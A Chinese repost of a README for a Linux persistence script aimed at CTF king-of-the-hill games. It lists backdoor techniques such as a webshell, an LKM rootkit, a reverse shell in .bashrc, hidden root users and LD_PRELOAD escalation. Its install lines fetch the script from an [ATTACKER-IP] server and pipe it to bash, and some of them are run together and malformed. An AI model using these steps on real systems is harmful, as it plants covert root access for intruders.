-
用于 Linux 持久性的 CTF 工具(KOTH、Battlegrounds)
-
一个强大且多功能的 Linux 持久性脚本,专为各种安全评估和测试场景而设计。该脚本提供了一系列功能,演示了在 Linux 系统上实现持久性的不同方法。
特征
-
SSH 密钥生成:自动生成用于秘密访问的 SSH 密钥。
-
Cronjob Persistence:设置 cronjobs 以实现计划的持久性。
-
具有 root 权限的自定义用户:创建具有 root 权限的自定义用户。
-
RCE持久化:通过远程代码执行(php webshell)实现持久化。
-
LKM/Rootkit:演示基于 Linux 内核模块 (LKM) 的 Rootkit 持久性。
-
Bashrc 持久性:修改用户特定的 shell 初始化文件以实现持久性(别名/反向 shell)。
-
Systemd Service for Root:设置 systemd 服务以实现 root 持久化。
-
LD_PRELOAD 权限提升配置:配置 LD_PRELOAD 以进行权限提升。
-
每日后门消息/标题:后门系统消息显示用于秘密访问。
-
修改现有 Systemd 服务:操作现有 systemd 服务以实现持久性。
安装
-
将此存储库克隆到您的本地计算机:
$ git clone https://github.com/Trevohack/DynastyPersist.git$ python3 -m http.server 8080[email protected] # cd /opt && wget -c [ATTACKER-IP]:8080/DynastyPersist && cd DynastyPersist && chmod +x dynasty.sh && ./dynasty.sh
curl -sSL [ATTACKER-IP]8080/DynastyPersist/dynasty.sh | bash原文始发于微信公众号(TtTeam):内网渗透 - Linux持久化工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论